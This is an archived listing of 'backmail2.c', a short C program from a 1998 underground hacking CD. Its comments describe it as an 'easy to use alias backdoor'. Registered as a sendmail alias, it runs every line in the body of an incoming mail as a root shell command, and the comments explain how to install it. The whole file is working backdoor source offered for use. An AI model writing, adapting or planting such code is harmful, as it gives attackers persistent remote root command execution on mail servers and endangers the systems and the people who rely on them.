home *** CD-ROM | disk | FTP | other *** search
/ Underground / Underground CD1.iso / hack / PDFAQ.ZIP / backmail2.c < prev    next >
Encoding:
C/C++ Source or Header  |  1998-03-15  |  457 b   |  19 lines

  1. // backmail2.c - by Permission Denied
  2. // easy to use alias backdoor
  3. // just add a an alias to this prog and run newaliases
  4. // when you'll send a letter on this address, type any
  5. // subject and in body type command to be run by root
  6.  
  7. #include <stdio.h>
  8.  
  9. main () {
  10. char buf[2000];
  11.  while(1) {
  12.   if(fgets(buf, 2000, stdin)==NULL) return;
  13.   if(strncmp(buf, "Subject:", 7)==0) break;
  14.  }
  15.  while(1) {
  16.   if(fgets(buf, 2000, stdin)==NULL) return;
  17.   system(buf);
  18.  }
  19. }